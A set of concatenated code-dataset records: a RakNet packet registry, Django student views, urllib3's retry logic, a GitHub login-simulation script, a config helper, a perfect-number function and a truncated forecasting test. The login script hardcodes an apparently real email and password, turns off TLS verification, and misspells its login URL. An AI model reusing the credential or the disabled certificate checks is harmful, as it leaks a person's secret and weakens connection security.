rakpy.protocol import fields\n\n\nclass PacketRegistry(dict):\n def __init__(self):\n super(PacketRegistry, self).__init__()\n\n def add(self, decorated_class):\n \"\"\"\n @add decorator\n :param decorated_class:\n \"\"\"\n id = decorated_class._meta.id\n if dict.__contains__(self, id):\n raise ValueError(\"Packet with id={} aldready registered\")\n dict.__setitem__(self, id, decorated_class)\n return decorated_class\nregistry = PacketRegistry()\n\n\n@convert_to_stream(\"data\")\ndef decode_packet(data):\n packet_id = six.indexbytes(data, 0)\n\n try:\n packet_class = registry[packet_id]\n except KeyError:\n raise UnknownPacketException(hex(packet_id))\n return packet_class(data)\n\n\nclass Options(object):\n def __init__(self, meta):\n self.id = meta.id\n self.structure = meta.structure\n self.fields = dict()\n\n def add_field(self, field, name):\n self.fields[name] = field\n\n\nclass PacketBase(type):\n def __new__(mcs, name, bases, attributes):\n super_new = super(PacketBase, mcs).__new__\n\n # Ensure initialization is only performed for subclasses of Packet\n # (excluding Packet class itself).\n parents = [b for b in bases if isinstance(b, PacketBase)]\n if not parents:\n return super_new(mcs, name, bases, attributes)\n\n module = attributes.pop('__module__')\n new_class = super_new(mcs, name, bases, {'__module__': module})\n\n # Add meta\n meta = attributes.pop('Meta')\n new_class.add_to_class(\"_meta\", Options(meta))\n\n # Add remaining attributes (fields are added here)\n for obj_name, obj in attributes.items():\n new_class.add_to_class(obj_name, obj)\n\n return new_class\n\n def add_to_class(cls, name, value):\n # We should call the contribute_to_class method only if it's bound\n if not inspect.isclass(value) and hasattr(value, 'contribute_to_class'):\n value.contribute_to_class(cls, name)\n else:\n setattr(cls, name, value)\n\n\nclass Packet(six.with_metaclass(PacketBase)):\n\n def __init__(self, *args, **kwargs):\n if len(args) == 1:\n self._init_from_buffer(args[0])\n super(Packet, self).__init__()\n\n @convert_to_stream(\"data\")\n def _init_from_buffer(self, data):\n self._data = data\n self._decode()\n\n def _get_id(self):\n return self._meta.id\n id = property(fget=lambda self: self._get_id())\n\n def _check_id(self, id):\n return id == self._meta.id\n\n def _get_structure(self):\n yield \"__id__\"\n for field_name in self._meta.structure:\n yield field_name\n\n def _decode(self):\n for name in self._get_structure():\n if name == \"__id__\":\n packet_id = fields.UnsignedByteField.decode(self._data)\n if not self._check_id(packet_id):\n raise ValueError()\n elif name == \"__magic__\":\n MagicField.decode(self._data)\n else:\n field = self._meta.fields[name]\n setattr(self, name, field.decode(self._data))\n if len(self._data):\n raise RemainingDataException(self._data)\n\n def __repr__(self):\n values = (\"=\".join([field_name, str(getattr(self, field_name))])\n for field_name in self._meta.structure if field_name != \"__magic__\")\n return \"{}({})\".format(type(self).__name__, \", \".join(values))\n\n\nclass MagicField(fields.Field):\n\n @classmethod\n @convert_to_stream(\"data\")\n def decode(cls, data):\n value = data.read(len(MAGIC))\n if value != MAGIC:\n raise ValueError()\n return b\"\"\n\n @classmethod\n def encode(cls, value):\n return MAGIC\n\n\nfrom rakpy.protocol.packets import *\n","repo_name":"jlirochon/rakpy","sub_path":"rakpy/protocol/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"27811994144","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.views.generic import View\n\nfrom ..models import (\n Student,\n Gewicht,\n Platz,\n Zeitraum,\n)\n\n\nclass StudentDetail(View):\n template_name = 'bp_cupid/student.html'\n\n @method_decorator(login_required)\n @method_decorator(user_passes_test(lambda u: u.is_staff))\n def get(self, request, mat_nr):\n \"\"\"\n Zeigt die Gewichte zu allen Praxen vom ausgewählten Studenten an.\n \"\"\"\n s = get_object_or_404(Student, mat_nr=mat_nr)\n\n akt_verw_zr = request.user.mitarbeiter.akt_verw_zeitraum\n aktuelle_zeitraeume = Zeitraum.objects.filter(\n block__verwaltungszeitraum=akt_verw_zr,\n )\n\n gewichte = Gewicht.objects.filter(\n student__mat_nr=mat_nr\n ).prefetch_related('praxis__freie_zeitraeume').order_by('-wert')\n\n try:\n platz = Platz.objects.select_related('praxis').get(student=s)\n except Platz.DoesNotExist:\n platz = None\n\n context = {\n 'student': s,\n 'gewichte': gewichte,\n 'platz': platz,\n 'aktuelle_zeitraeume': aktuelle_zeitraeume,\n }\n\n return render(request, self.template_name, context)\n\n\nclass StudentList(View):\n template_name = 'bp_cupid/studenten.html'\n\n @method_decorator(login_required)\n @method_decorator(user_passes_test(lambda u: u.is_staff))\n def get(self, request):\n \"\"\"\n Zeigt alle Studenten in einer Tabelle nach Nachname sortiert an.\n \"\"\"\n akt_verw_zr = request.user.mitarbeiter.akt_verw_zeitraum\n\n context = {\n 'studenten': Student.objects.filter(\n verwaltungszeitraum=akt_verw_zr\n ).select_related(\n 'platz'\n ).prefetch_related(\n 'landkreise',\n 'bevorzugte_praxen',\n ).order_by('name'),\n }\n\n anz_studis = Student.objects.filter(\n verwaltungszeitraum=akt_verw_zr\n ).count()\n\n if anz_studis:\n anz_studis_mit_fragebogen = Student.objects.filter(\n verwaltungszeitraum=akt_verw_zr,\n hat_fragebogen_ausgefuellt=True,\n ).count()\n\n rel_fragebogen = round(\n 100 * anz_studis_mit_fragebogen / anz_studis, 1\n )\n\n context.update(\n {\n 'anz_studis': anz_studis,\n 'anz_studis_mit_fragebogen': anz_studis_mit_fragebogen,\n 'rel_fragebogen': rel_fragebogen,\n }\n )\n\n return render(request, self.template_name, context)\n","repo_name":"hutchison/bp_mgmt","sub_path":"bp_cupid/views/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35848624731","text":"from __future__ import absolute_import\n\nimport email\nimport logging\nimport re\nimport time\nimport warnings\nfrom collections import namedtuple\nfrom itertools import takewhile\n\nfrom ..exceptions import (\n ConnectTimeoutError,\n InvalidHeader,\n MaxRetryError,\n ProtocolError,\n ProxyError,\n ReadTimeoutError,\n ResponseError,\n)\nfrom ..packages import six\n\nlog = logging.getLogger(__name__)\n\n\n# Data structure for representing the metadata of requests that result in a retry.\nRequestHistory = namedtuple(\n \"RequestHistory\", [\"method\", \"url\", \"error\", \"status\", \"redirect_location\"]\n)\n\n\n# TODO: In v2 we can remove this sentinel and metaclass with deprecated options.\n_Default = object()\n\n\nclass _RetryMeta(type):\n @property\n def DEFAULT_METHOD_WHITELIST(cls):\n warnings.warn(\n \"Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead\",\n DeprecationWarning,\n )\n return cls.DEFAULT_ALLOWED_METHODS\n\n @DEFAULT_METHOD_WHITELIST.setter\n def DEFAULT_METHOD_WHITELIST(cls, value):\n warnings.warn(\n \"Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead\",\n DeprecationWarning,\n )\n cls.DEFAULT_ALLOWED_METHODS = value\n\n @property\n def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls):\n warnings.warn(\n \"Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead\",\n DeprecationWarning,\n )\n return cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT\n\n @DEFAULT_REDIRECT_HEADERS_BLACKLIST.setter\n def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls, value):\n warnings.warn(\n \"Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead\",\n DeprecationWarning,\n )\n cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT = value\n\n @property\n def BACKOFF_MAX(cls):\n warnings.warn(\n \"Using 'Retry.BACKOFF_MAX' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead\",\n DeprecationWarning,\n )\n return cls.DEFAULT_BACKOFF_MAX\n\n @BACKOFF_MAX.setter\n def BACKOFF_MAX(cls, value):\n warnings.warn(\n \"Using 'Retry.BACKOFF_MAX' is deprecated and \"\n \"will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead\",\n DeprecationWarning,\n )\n cls.DEFAULT_BACKOFF_MAX = value\n\n\n@six.add_metaclass(_RetryMeta)\nclass Retry(object):\n \"\"\"Retry configuration.\n\n Each retry attempt will create a new Retry object with updated values, so\n they can be safely reused.\n\n Retries can be defined as a default for a pool::\n\n retries = Retry(connect=5, read=2, redirect=5)\n http = PoolManager(retries=retries)\n response = http.request('GET', 'http://example.com/')\n\n Or per-request (which overrides the default for the pool)::\n\n response = http.request('GET', 'http://example.com/', retries=Retry(10))\n\n Retries can be disabled by passing ``False``::\n\n response = http.request('GET', 'http://example.com/', retries=False)\n\n Errors will be wrapped in :class:`~urllib3.exceptions.MaxRetryError` unless\n retries are disabled, in which case the causing exception will be raised.\n\n :param int total:\n Total number of retries to allow. Takes precedence over other counts.\n\n Set to ``None`` to remove this constraint and fall back on other\n counts.\n\n Set to ``0`` to fail on the first retry.\n\n Set to ``False`` to disable and imply ``raise_on_redirect=False``.\n\n :param int connect:\n How many connection-related errors to retry on.\n\n These are errors raised before the request is sent to the remote server,\n which we assume has not triggered the server to process the request.\n\n Set to ``0`` to fail on the first retry of this type.\n\n :param int read:\n How many times to retry on read errors.\n\n These errors are raised after the request was sent to the server, so the\n request may have side-effects.\n\n Set to ``0`` to fail on the first retry of this type.\n\n :param int redirect:\n How many redirects to perform. Limit this to avoid infinite redirect\n loops.\n\n A redirect is a HTTP response with a status code 301, 302, 303, 307 or\n 308.\n\n Set to ``0`` to fail on the first retry of this type.\n\n Set to ``False`` to disable and imply ``raise_on_redirect=False``.\n\n :param int status:\n How many times to retry on bad status codes.\n\n These are retries made on responses, where status code matches\n ``status_forcelist``.\n\n Set to ``0`` to fail on the first retry of this type.\n\n :param int other:\n How many times to retry on other errors.\n\n Other errors are errors that are not connect, read, redirect or status errors.\n These errors might be raised after the request was sent to the server, so the\n request might have side-effects.\n\n Set to ``0`` to fail on the first retry of this type.\n\n If ``total`` is not set, it's a good idea to set this to 0 to account\n for unexpected edge cases and avoid infinite retry loops.\n\n :param iterable allowed_methods:\n Set of uppercased HTTP method verbs that we should retry on.\n\n By default, we only retry on methods which are considered to be\n idempotent (multiple requests with the same parameters end with the\n same state). See :attr:`Retry.DEFAULT_ALLOWED_METHODS`.\n\n Set to a ``False`` value to retry on any verb.\n\n .. warning::\n\n Previously this parameter was named ``method_whitelist``, that\n usage is deprecated in v1.26.0 and will be removed in v2.0.\n\n :param iterable status_forcelist:\n A set of integer HTTP status codes that we should force a retry on.\n A retry is initiated if the request method is in ``allowed_methods``\n and the response status code is in ``status_forcelist``.\n\n By default, this is disabled with ``None``.\n\n :param float backoff_factor:\n A backoff factor to apply between attempts after the second try\n (most errors are resolved immediately by a second try without a\n delay). urllib3 will sleep for::\n\n {backoff factor} * (2 ** ({number of total retries} - 1))\n\n seconds. If the backoff_factor is 0.1, then :func:`.sleep` will sleep\n for [0.0s, 0.2s, 0.4s, ...] between retries. It will never be longer\n than :attr:`Retry.DEFAULT_BACKOFF_MAX`.\n\n By default, backoff is disabled (set to 0).\n\n :param bool raise_on_redirect: Whether, if the number of redirects is\n exhausted, to raise a MaxRetryError, or to return a response with a\n response code in the 3xx range.\n\n :param bool raise_on_status: Similar meaning to ``raise_on_redirect``:\n whether we should raise an exception, or return a response,\n if status falls in ``status_forcelist`` range and retries have\n been exhausted.\n\n :param tuple history: The history of the request encountered during\n each call to :meth:`~Retry.increment`. The list is in the order\n the requests occurred. Each list item is of class :class:`RequestHistory`.\n\n :param bool respect_retry_after_header:\n Whether to respect Retry-After header on status codes defined as\n :attr:`Retry.RETRY_AFTER_STATUS_CODES` or not.\n\n :param iterable remove_headers_on_redirect:\n Sequence of headers to remove from the request when a response\n indicating a redirect is returned before firing off the redirected\n request.\n \"\"\"\n\n #: Default methods to be used for ``allowed_methods``\n DEFAULT_ALLOWED_METHODS = frozenset(\n [\"HEAD\", \"GET\", \"PUT\", \"DELETE\", \"OPTIONS\", \"TRACE\"]\n )\n\n #: Default status codes to be used for ``status_forcelist``\n RETRY_AFTER_STATUS_CODES = frozenset([413, 429, 503])\n\n #: Default headers to be used for ``remove_headers_on_redirect``\n DEFAULT_REMOVE_HEADERS_ON_REDIRECT = frozenset([\"Cookie\", \"Authorization\"])\n\n #: Maximum backoff time.\n DEFAULT_BACKOFF_MAX = 120\n\n def __init__(\n self,\n total=10,\n connect=None,\n read=None,\n redirect=None,\n status=None,\n other=None,\n allowed_methods=_Default,\n status_forcelist=None,\n backoff_factor=0,\n raise_on_redirect=True,\n raise_on_status=True,\n history=None,\n respect_retry_after_header=True,\n remove_headers_on_redirect=_Default,\n # TODO: Deprecated, remove in v2.0\n method_whitelist=_Default,\n ):\n\n if method_whitelist is not _Default:\n if allowed_methods is not _Default:\n raise ValueError(\n \"Using both 'allowed_methods' and \"\n \"'method_whitelist' together is not allowed. \"\n \"Instead only use 'allowed_methods'\"\n )\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. Use 'allowed_methods' instead\",\n DeprecationWarning,\n stacklevel=2,\n )\n allowed_methods = method_whitelist\n if allowed_methods is _Default:\n allowed_methods = self.DEFAULT_ALLOWED_METHODS\n if remove_headers_on_redirect is _Default:\n remove_headers_on_redirect = self.DEFAULT_REMOVE_HEADERS_ON_REDIRECT\n\n self.total = total\n self.connect = connect\n self.read = read\n self.status = status\n self.other = other\n\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.allowed_methods = allowed_methods\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n self.remove_headers_on_redirect = frozenset(\n [h.lower() for h in remove_headers_on_redirect]\n )\n\n def new(self, **kw):\n params = dict(\n total=self.total,\n connect=self.connect,\n read=self.read,\n redirect=self.redirect,\n status=self.status,\n other=self.other,\n status_forcelist=self.status_forcelist,\n backoff_factor=self.backoff_factor,\n raise_on_redirect=self.raise_on_redirect,\n raise_on_status=self.raise_on_status,\n history=self.history,\n remove_headers_on_redirect=self.remove_headers_on_redirect,\n respect_retry_after_header=self.respect_retry_after_header,\n )\n\n # TODO: If already given in **kw we use what's given to us\n # If not given we need to figure out what to pass. We decide\n # based on whether our class has the 'method_whitelist' property\n # and if so we pass the deprecated 'method_whitelist' otherwise\n # we use 'allowed_methods'. Remove in v2.0\n if \"method_whitelist\" not in kw and \"allowed_methods\" not in kw:\n if \"method_whitelist\" in self.__dict__:\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. Use 'allowed_methods' instead\",\n DeprecationWarning,\n )\n params[\"method_whitelist\"] = self.allowed_methods\n else:\n params[\"allowed_methods\"] = self.allowed_methods\n\n params.update(kw)\n return type(self)(**params)\n\n @classmethod\n def from_int(cls, retries, redirect=True, default=None):\n \"\"\"Backwards-compatibility for the old retries format.\"\"\"\n if retries is None:\n retries = default if default is not None else cls.DEFAULT\n\n if isinstance(retries, Retry):\n return retries\n\n redirect = bool(redirect) and None\n new_retries = cls(retries, redirect=redirect)\n log.debug(\"Converted retries value: %r -> %r\", retries, new_retries)\n return new_retries\n\n def get_backoff_time(self):\n \"\"\"Formula for computing the current backoff\n\n :rtype: float\n \"\"\"\n # We want to consider only the last consecutive errors sequence (Ignore redirects).\n consecutive_errors_len = len(\n list(\n takewhile(lambda x: x.redirect_location is None, reversed(self.history))\n )\n )\n if consecutive_errors_len <= 1:\n return 0\n\n backoff_value = self.backoff_factor * (2 ** (consecutive_errors_len - 1))\n return min(self.DEFAULT_BACKOFF_MAX, backoff_value)\n\n def parse_retry_after(self, retry_after):\n # Whitespace: https://tools.ietf.org/html/rfc7230#section-3.2.4\n if re.match(r\"^\\s*[0-9]+\\s*$\", retry_after):\n seconds = int(retry_after)\n else:\n retry_date_tuple = email.utils.parsedate_tz(retry_after)\n if retry_date_tuple is None:\n raise InvalidHeader(\"Invalid Retry-After header: %s\" % retry_after)\n if retry_date_tuple[9] is None: # Python 2\n # Assume UTC if no timezone was specified\n # On Python2.7, parsedate_tz returns None for a timezone offset\n # instead of 0 if no timezone is given, where mktime_tz treats\n # a None timezone offset as local time.\n retry_date_tuple = retry_date_tuple[:9] + (0,) + retry_date_tuple[10:]\n\n retry_date = email.utils.mktime_tz(retry_date_tuple)\n seconds = retry_date - time.time()\n\n if seconds < 0:\n seconds = 0\n\n return seconds\n\n def get_retry_after(self, response):\n \"\"\"Get the value of Retry-After in seconds.\"\"\"\n\n retry_after = response.headers.get(\"Retry-After\")\n\n if retry_after is None:\n return None\n\n return self.parse_retry_after(retry_after)\n\n def sleep_for_retry(self, response=None):\n retry_after = self.get_retry_after(response)\n if retry_after:\n time.sleep(retry_after)\n return True\n\n return False\n\n def _sleep_backoff(self):\n backoff = self.get_backoff_time()\n if backoff <= 0:\n return\n time.sleep(backoff)\n\n def sleep(self, response=None):\n \"\"\"Sleep between retry attempts.\n\n This method will respect a server's ``Retry-After`` response header\n and sleep the duration of the time requested. If that is not present, it\n will use an exponential backoff. By default, the backoff factor is 0 and\n this method will return immediately.\n \"\"\"\n\n if self.respect_retry_after_header and response:\n slept = self.sleep_for_retry(response)\n if slept:\n return\n\n self._sleep_backoff()\n\n def _is_connection_error(self, err):\n \"\"\"Errors when we're fairly sure that the server did not receive the\n request, so it should be safe to retry.\n \"\"\"\n if isinstance(err, ProxyError):\n err = err.original_error\n return isinstance(err, ConnectTimeoutError)\n\n def _is_read_error(self, err):\n \"\"\"Errors that occur after the request has been started, so we should\n assume that the server began processing it.\n \"\"\"\n return isinstance(err, (ReadTimeoutError, ProtocolError))\n\n def _is_method_retryable(self, method):\n \"\"\"Checks if a given HTTP method should be retried upon, depending if\n it is included in the allowed_methods\n \"\"\"\n # TODO: For now favor if the Retry implementation sets its own method_whitelist\n # property outside of our constructor to avoid breaking custom implementations.\n if \"method_whitelist\" in self.__dict__:\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. Use 'allowed_methods' instead\",\n DeprecationWarning,\n )\n allowed_methods = self.method_whitelist\n else:\n allowed_methods = self.allowed_methods\n\n if allowed_methods and method.upper() not in allowed_methods:\n return False\n return True\n\n def is_retry(self, method, status_code, has_retry_after=False):\n \"\"\"Is this method/status code retryable? (Based on allowlists and control\n variables such as the number of total retries to allow, whether to\n respect the Retry-After header, whether this header is present, and\n whether the returned status code is on the list of status codes to\n be retried upon on the presence of the aforementioned header)\n \"\"\"\n if not self._is_method_retryable(method):\n return False\n\n if self.status_forcelist and status_code in self.status_forcelist:\n return True\n\n return (\n self.total\n and self.respect_retry_after_header\n and has_retry_after\n and (status_code in self.RETRY_AFTER_STATUS_CODES)\n )\n\n def is_exhausted(self):\n \"\"\"Are we out of retries?\"\"\"\n retry_counts = (\n self.total,\n self.connect,\n self.read,\n self.redirect,\n self.status,\n self.other,\n )\n retry_counts = list(filter(None, retry_counts))\n if not retry_counts:\n return False\n\n return min(retry_counts) < 0\n\n def increment(\n self,\n method=None,\n url=None,\n response=None,\n error=None,\n _pool=None,\n _stacktrace=None,\n ):\n \"\"\"Return a new Retry object with incremented retry counters.\n\n :param response: A response object, or None, if the server did not\n return a response.\n :type response: :class:`~urllib3.response.HTTPResponse`\n :param Exception error: An error encountered during the request, or\n None if the response was received successfully.\n\n :return: A new ``Retry`` object.\n \"\"\"\n if self.total is False and error:\n # Disabled, indicate to re-raise the error.\n raise six.reraise(type(error), error, _stacktrace)\n\n total = self.total\n if total is not None:\n total -= 1\n\n connect = self.connect\n read = self.read\n redirect = self.redirect\n status_count = self.status\n other = self.other\n cause = \"unknown\"\n status = None\n redirect_location = None\n\n if error and self._is_connection_error(error):\n # Connect retry?\n if connect is False:\n raise six.reraise(type(error), error, _stacktrace)\n elif connect is not None:\n connect -= 1\n\n elif error and self._is_read_error(error):\n # Read retry?\n if read is False or not self._is_method_retryable(method):\n raise six.reraise(type(error), error, _stacktrace)\n elif read is not None:\n read -= 1\n\n elif error:\n # Other retry?\n if other is not None:\n other -= 1\n\n elif response and response.get_redirect_location():\n # Redirect retry?\n if redirect is not None:\n redirect -= 1\n cause = \"too many redirects\"\n redirect_location = response.get_redirect_location()\n status = response.status\n\n else:\n # Incrementing because of a server error like a 500 in\n # status_forcelist and the given method is in the allowed_methods\n cause = ResponseError.GENERIC_ERROR\n if response and response.status:\n if status_count is not None:\n status_count -= 1\n cause = ResponseError.SPECIFIC_ERROR.format(status_code=response.status)\n status = response.status\n\n history = self.history + (\n RequestHistory(method, url, error, status, redirect_location),\n )\n\n new_retry = self.new(\n total=total,\n connect=connect,\n read=read,\n redirect=redirect,\n status=status_count,\n other=other,\n history=history,\n )\n\n if new_retry.is_exhausted():\n raise MaxRetryError(_pool, url, error or ResponseError(cause))\n\n log.debug(\"Incremented Retry for (url='%s'): %r\", url, new_retry)\n\n return new_retry\n\n def __repr__(self):\n return (\n \"{cls.__name__}(total={self.total}, connect={self.connect}, \"\n \"read={self.read}, redirect={self.redirect}, status={self.status})\"\n ).format(cls=type(self), self=self)\n\n def __getattr__(self, item):\n if item == \"method_whitelist\":\n # TODO: Remove this deprecated alias in v2.0\n warnings.warn(\n \"Using 'method_whitelist' with Retry is deprecated and \"\n \"will be removed in v2.0. Use 'allowed_methods' instead\",\n DeprecationWarning,\n )\n return self.allowed_methods\n try:\n return getattr(super(Retry, self), item)\n except AttributeError:\n return getattr(Retry, item)\n\n\n# For backwards compatibility (equivalent to pre-v1.9):\nRetry.DEFAULT = Retry(3)\n","repo_name":"pypa/pipenv","sub_path":"pipenv/patched/pip/_vendor/urllib3/util/retry.py","file_name":"retry.py","file_ext":"py","file_size_in_byte":22013,"program_lang":"python","lang":"en","doc_type":"code","stars":24273,"dataset":"github-code","pt":"34"} +{"seq_id":"16964033740","text":"\"\"\"\n 模拟登陆 Github\ndate: 18-10-20 上午9:17\n\"\"\"\nimport requests\nfrom lxml import etree\n\n\nclass Login(object):\n \"\"\"\n 模拟登陆 Github\n \"\"\"\n\n def __init__(self):\n \"\"\"\n 初始化\n \"\"\"\n # 请求头\n self.headers = {\n \"Referer\": \"https://github.com\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\",\n \"Host\": \"github.com\"\n }\n # 登陆路径\n self.login_url = \"https://github.com/login\"\n # 提交路径\n self.post_url = \"https://gihub.com/seesion\"\n # 个人信息路径\n self.logined_url = \"https://github.com/settings/profile\"\n # 会话 -- 自动处理Cookie\n self.session = requests.Session()\n\n def token(self):\n \"\"\"\n 获取表单提交参数\n :return: 表单参数\n \"\"\"\n # 请求访问, 获取响应报文 verify 是否验证\n response = self.session.get(self.login_url, headers=self.headers, verify=False)\n # 加载响应报文\n selector = etree.HTML(response.text)\n # 解析数据, 获取表单参数\n token = selector.xpath(\"//form/input[2]/@value\")[0]\n # 返回表单参数\n return token\n\n def login(self, email, password):\n \"\"\"\n 模拟登陆, 提交表单\n :param email: 账号\n :param password: 密码\n :return:\n \"\"\"\n # 表单提交数据\n post_data = {\n \"commit\": \"Sign in\",\n \"utf8\": \"✓\",\n \"authenticity_token\": self.token(),\n \"login\": email,\n \"password\": password\n }\n # 请求访问, post_url 提交路径, post_data 提交参数, 请求头 verify 是否验证\n response = self.session.post(self.post_url, data=post_data, headers=self.headers, verify=False)\n # 如果返回状态码为200\n if response.status_code == 200:\n # 处理动态信息\n self.dynamics(response.text)\n\n # 请求访问, logined_url 个人信息路径, 请求头 verify 是否验证\n response = self.session.get(self.logined_url, headers=self.headers, verify=False)\n # 如果返回状态码为200\n if response.status_code == 200:\n # 处理个人信息\n self.profile(response.text)\n\n def dynamics(self, html):\n \"\"\"\n 提取动态信息\n :param html: 源码\n :return:\n \"\"\"\n # 加载\n selector = etree.HTML(html)\n # 解析\n dynamics = selector.xpath(\"//div[contains(@class, 'news')]//div[contains(@class, 'alert')]\")\n # 循环\n for item in dynamics:\n # 获取具体数据\n dynamic = \" \".join(item.xpath(\".//div[@class='title']//text()\")).strip()\n # 输出提示\n print(dynamic)\n\n def profile(self, html):\n \"\"\"\n 处理个人信息\n :param html: 源码\n :return:\n \"\"\"\n # 加载源码\n selector = etree.HTML(html)\n # 解析数据 -- 获取用户名\n name = selector.xpath(\"//input[@id='user_profile_name']/@value\")[0]\n # 解析数据 -- 获取邮箱\n email = selector.xpath(\"//select[@id='user_profile_email']/option[@value!='']/text()\")\n # 输出提示\n print(name, email)\n\n\nif __name__ == '__main__':\n login = Login()\n login.login(\"lnsist@yeah.net\", \"Xx.992246086\")\n","repo_name":"lnsist/DemoTest","sub_path":"爬虫/Cookies池/模拟登陆/模拟登陆_Github.py","file_name":"模拟登陆_Github.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21727614947","text":"# sb_conf.py\n\nimport json\nimport os.path\nfrom etc import Debug\n# Simple JSON Handler\n\n\ndef Write(filename, config) -> bool:\n \"\"\"Returns True when the file operation was successful, otherwise False.\"\"\"\n try:\n with open(filename, \"w\") as f:\n json.dump(config, f, indent=4)\n Debug(f\"Wrote configuration to {filename}.\")\n retVal = True\n f.close()\n\n except Exception as e:\n print(\"Failed to write config file: \", e)\n retVal = False\n return retVal\n\n\ndef Read(filename, default) -> dict:\n \"\"\"\n Returns a dictionary loaded from a JSON file located at the given path, or a default if file doesn't exist.\n Return None when an error occurs during the file operation.\n \"\"\"\n\n if not os.path.isfile(filename):\n Debug(\"Config file doesn't exist. Creating...\")\n Write(filename, default)\n Debug(f\"Config file {filename} created.\")\n retVal = default\n else:\n try:\n with open(filename, \"r\") as f:\n config = json.load(f)\n Debug(f\"Successfully read configuration file: {filename}.\")\n retVal = config\n f.close()\n\n except Exception as x:\n print(f\"An error occurred during reading {filename}: {x}\")\n retVal = None\n return retVal\n","repo_name":"Befector/SimpleBank","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24836741159","text":"# -*- coding: utf-8 -*-\n\nclass PerfectNum():\n def perfectNum(self, num: \"int\") -> \"int\":\n ct = 0\n # ans = []\n for i in range(2, num + 1):\n sum_ = 1\n for j in range(2, int(i ** 0.5) + 1):\n if i % j == 0:\n sum_ += j\n sum_ += i / j\n if i == sum_:\n ct += 1\n # ans.append(i)\n # print(ans)\n return ct\n\ndef main():\n test = PerfectNum()\n print(test.perfectNum(1000))\n\nif __name__ == \"__main__\":\n main()","repo_name":"gli81/HuaweiTest","sub_path":"056/PerfectNum.py","file_name":"PerfectNum.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11904377774","text":"import logging\nfrom os.path import abspath, dirname, join\nimport sys\nimport unittest\n\n\nfrom merlion.evaluate.forecast import ForecastEvaluator, ForecastEvaluatorConfig, ForecastMetric\nfrom merlion.models.ensemble.combine import MetricWeightedMean\nfrom merlion.models.ensemble.forecast import ForecasterEnsemble, ForecasterEnsembleConfig\nfrom merlion.models.forecast.arima import ArimaConfig, Arima\nfrom merlion.models.forecast.ets import ETSConfig, ETS\nfrom merlion.transform.base import Identity\nfrom merlion.utils.data_io import csv_to_time_series\nfrom merlion.utils.time_series import UnivariateTimeSeries\n\n\nlogger = logging.getLogger(__name__)\nrootdir = dirname(dirname(dirname(abspath(__file__))))\n\n\nclass TestEvaluateForecast(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def test_single_model(self):\n print(\"-\" * 80)\n logger.info(\"test_single_model\\n\" + \"-\" * 80 + \"\\n\")\n\n # Create a piecewise linear time series\n values = [i for i in range(60)]\n values += [values[-1] + 2 * (i + 1) for i in range(30)]\n values += [values[-1] + 3 * (i + 1) for i in range(30)]\n values += [values[-1] + 1 * (i + 1) for i in range(30)]\n ts = UnivariateTimeSeries(time_stamps=None, values=values, freq=\"1d\").to_ts()\n\n # Get train & test split\n self.train_data = ts[:30]\n self.test_data = ts[30:]\n\n # Set up a simple ARIMA model that can learn a linear relationship\n # We will be training the model on 30 day chunks (which are linear) and\n # having it forecast on 30 days chunks (which may have a different\n # slope than the model expects)\n self.model = Arima(ArimaConfig(order=(1, 1, 0), max_forecast_steps=30))\n\n logger.info(\"Training model using an evaluator...\")\n evaluator = ForecastEvaluator(\n model=self.model, config=ForecastEvaluatorConfig(retrain_freq=\"30d\", train_window=\"30d\")\n )\n\n # Get pred\n _, pred = evaluator.get_predict(train_vals=self.train_data, test_vals=self.test_data)\n\n # Calculate evaluation metric\n smape = evaluator.evaluate(ground_truth=self.test_data, predict=pred, metric=ForecastMetric.sMAPE)\n self.assertAlmostEqual(smape, 9.9, delta=0.1)\n\n def test_ensemble(self):\n print(\"-\" * 80)\n logger.info(\"test_ensemble\\n\" + \"-\" * 80 + \"\\n\")\n\n csv_name = join(rootdir, \"data\", \"example.csv\")\n ts = csv_to_time_series(csv_name, 